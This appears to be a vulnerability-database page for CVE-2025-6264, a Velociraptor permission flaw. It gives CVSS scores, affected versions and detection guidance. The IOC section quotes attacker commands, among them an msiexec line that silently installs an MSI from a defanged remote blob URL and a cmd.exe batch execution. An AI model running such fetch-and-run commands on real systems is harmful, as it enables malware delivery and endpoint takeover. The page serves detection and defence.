cbcvebase.
CVE-2025-6264
published 2025-06-20

CVE-2025-6264: Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated…

PriorityP181medium5.5CVSS 3.1
AVNACHPRHUINSCCLILAL
ITWVulnCheck KEVRansomware
Exploited in the wild
EPSS
0.96%
57.2th percentile
Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions. To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT given typically by the "Investigator' role).

Affected

2 ranges
VendorProductVersion rangeFixed in
rapid7velociraptor< 0.74.30.74.3
www.velocidex.comgolang_velociraptor>= 0 < 0.74.30.74.3

Detection & IOCsextracted from sources · hover to see the quote

urlhxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi
commandmsiexec /q /i hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi
commandC:\Windows\System32\cmd.exe cmd.exe /Q /c cmd /c c:\windows\temp\1.bat /y 1> \Windows\Temp\suLGnR 2>&1
pathc:\windows\temp\1.bat
versionVelociraptor 0.73.4.0
  • Detect msiexec spawning with a remote Azure Blob Storage URL containing '/veeam/v2.msi' as the install source — this is the delivery mechanism for the malicious Velociraptor MSI.
  • Alert on Velociraptor process launching repeatedly on a host that has been network-isolated — actors relaunched the tool multiple times even after isolation.
  • Detect PowerShell scripts containing the RSA public key string 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+' — this is embedded in the fileless Warlock encryptor PowerShell script.
  • Monitor for Velociraptor artifact collection of 'Admin.Client.UpdateClientConfig' by users with only COLLECT_CLIENT / Investigator role — this is the exploited artifact that does not enforce the required EXECVE permission.
  • Alert on Visual Studio Code being downloaded and executed by Velociraptor client processes — threat actors leveraged this to create C2 tunnels.
  • ·Talos could not confirm whether CVE-2025-6264 was actively exploited in the campaign — the vulnerable version was present but exploitation was not definitively observed.
  • ·CVE-2025-6264 requires the attacker to already hold COLLECT_CLIENT permissions (Investigator role) — it is a privilege escalation within Velociraptor, not an unauthenticated entry point.

CVSS provenance

nvdv3.15.5MEDIUMCVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L
vulncheck5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.